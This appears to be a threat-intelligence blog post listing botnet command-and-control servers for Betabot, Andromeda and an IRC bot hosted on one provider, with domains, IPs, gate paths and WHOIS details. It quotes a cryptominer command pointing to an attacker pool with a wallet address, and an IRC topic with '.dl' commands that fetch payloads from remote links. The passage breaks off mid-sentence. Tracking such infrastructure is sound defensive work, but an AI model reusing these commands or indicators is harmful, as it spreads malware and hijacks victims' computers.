alibabahost.com

sinsec.net (Betabot http botnet hosted by alibabahost.com)

Resolved sinsec.net to 37.221.170.96 Server:  sinsec.net Gate file:  /turndown/order.php Alternate domains: divinestresser.info radicalpkz.com perp.pw thefox.pw uploadme.pw perp.se Domain info: sinsec.net Domain Name: SINSEC.NET Registry Domain ID: 1814650535_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.enom.com Registrar URL: www.enom.com Updated Date: 2013-07-12 10:27:24Z Creation Date: 2013-07-12 17:27:00Z Registrar Registration Expiration Date: 2014-07-12 17:27:00Z Registrar: ENOM, INC. Registrar IANA ID: 48

haveityourway.pw (betabot http botnet hosted by Alibabahost.com)

Resolved haveityourway.pw to 103.31.187.77 Server:  haveityourway.pw Gate file:  /members/order.php Alternate domains (currently not registered): thebestway42.pwitsoktohaveityourway.comlosmejoresburgers1.com The first domain was only registered yesterday.  Hosting infos: http://whois.domaintools.com/103.31.187.77 Related md5s (Search on Malwr.com to download samples) Betabot: 3b0907c7bf881f8f5f9fa2190384d3dd

kankarmz.ru (betabot http botnet hosted by Alibabahost.com)

Resolved kankarmz.ru to 37.221.170.35 Server:  kankarmz.ru Gate file:  /Duf67/H8938_827.php Alternate domains (both are currently unregistered): u023sjasj.netiodijsakj.net This is one of only three or so betabots that I have seen rename the gate file from order.php to something less obvious. I guess that might be a bit too advanced for the average HF skid. Hosting infos:

solutionswiki.com (Andromeda http botnet hosted by alibabahost.com)

Resolved solutionswiki.com to 109.163.233.107 Server:  solutionswiki.com Gate file:  /pages/image.php There is also a betabot hosted on the same domain. Mining infos:  dasHosts.exe -a scrypt-jane -o http://37.221.170.226:8344 -O YFicRwX9HpMkVovPPWG3NAJ9Tpom3YeXqC:x Hosting infos: http://whois.domaintools.com/109.163.233.107

solutionswiki.com (Betabot http botnet hosted by alibabahost.com)

Resolved solutionswiki.com to 109.163.233.107 Server:  solutionswiki.com Port:  4137 Gate file:  /system/order.php I don’t know why betabot owners keep putting their http servers on ports other than 80. Seems pretty dumb. I guess you can only expect so much from a HF bot and it’s owners. Hosting infos: http://whois.domaintools.com/109.163.233.107

x01bkr2.biz (snk asper mod irc botnet hosted by buyurl.net, alibabahost.com)

Resolved x01bkr2.biz to 94.242.237.128, 37.221.170.208 Server:  x01bkr2.biz Port:  4723 Channel:  #o.O Topic for #o.O is: .dl hxxp://www.mediafire.com/download.php?dqr1p0wz8tpz9tz | .dl hxxp://www.mediafire.com/download.php?uqqhg3equchc7bd Topic for #o.O set by SpliT at Sat Apr 27 17:57:29 2013 The skype spreader downloads messages from hxxp://waxortraxe.org/icon.jpg Alternate domains: zr0x1b9.biz xkzykxb.biz xeyaz.biz Hosting infos: http://whois.domaintools.com/94.242.237.128 Hosting infos: http://whois.domaintools.com/37.221.170.208 EDIT: snk is now desperately